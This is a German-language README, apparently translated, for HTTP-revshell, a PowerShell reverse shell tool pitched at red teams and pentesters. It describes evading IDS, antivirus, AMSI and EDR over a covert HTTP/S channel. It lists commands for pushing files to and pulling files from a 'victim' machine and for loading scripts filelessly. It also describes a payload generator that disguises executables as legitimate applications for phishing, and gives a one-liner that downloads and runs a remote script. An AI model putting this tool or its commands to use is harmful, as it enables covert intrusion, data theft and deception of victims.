
Powershell Reverse Shell mit HTTP/S-Protokoll, AMSI-Umgehung und Proxy-Unterstützung
HTTP-revshell ist ein Tool, das sich an Redteam-Übungen und Pentester richtet. Es stellt eine Reverse-Verbindung über das HTTP/S-Protokoll her und nutzt einen verdeckten Kanal, um die Kontrolle über das Opfergerät durch Webanfragen zu erlangen und so Lösungen wie IDS, IPS und AV zu umgehen.
HINWEIS: Das Tool wird hinsichtlich Umgehungstechniken nicht gewartet. Mit nur wenigen Änderungen können viele auf dem Markt erhältliche EDRs umgangen werden.

Serververwendung:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host Listen Host
port Listen Port
optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
Clientverwendung:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
Diese Funktion ermöglicht das Hochladen beliebiger Dateien auf das Opfergerät.
Verwendung:
upload /src/path/file C:\dest\path\file
Diese Funktion ermöglicht das Herunterladen einer Datei auf das Angreifer-Gerät.
Verwendung:
download C:\src\path\file /dst/path/file
Diese Funktion ermöglicht das Laden von PowerShell-Skripten, ohne auf die Festplatte des Opfers schreiben zu müssen, indem die Datei über legitimen HTTP-Verkehr gelesen wird.
Verwendung:
loadps1 /path/to/the/local/server/PowershellScript.ps1
Dieses Skript ermöglicht die Erstellung einer ausführbaren Datei mit dem für HTTP-revshell notwendigen Payload. Folgen Sie einfach den Anweisungen auf dem Bildschirm, um ihn zu generieren. Es gibt 6 vordefinierte Vorlagen und eine anpassbare mit den gewünschten Daten.
Die vom Tool generierten Payloads enthalten das legitime Symbol der Anwendung sowie die Produkt- und Urheberrechtsinformationen der Originalanwendung. Darüber hinaus öffnet jeder von ihnen die Originalanwendung, bevor die Verbindung zum Server hergestellt wird, und gibt sich so als legitime Anwendung aus. Dies kann für Phishing- oder Red-Team-Übungen verwendet werden.
Verwendung des Payload-Generators:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

WICHTIG: Alle Felder in den vordefinierten Vorlagen werden durch Drücken der Eingabetaste automatisch ausgefüllt.
Dieses Skript ist unter LGPLv3+ lizenziert. Direkter Link zur Lizenz.
HTTP-revshell sollte nur für autorisierte Penetrationstests und/oder gemeinnützige Bildungszwecke verwendet werden. Jeglicher Missbrauch dieser Software liegt nicht in der Verantwortung des Autors oder anderer Mitarbeiter. Verwenden Sie es auf eigenen Servern und/oder mit Erlaubnis des Serverbesitzers.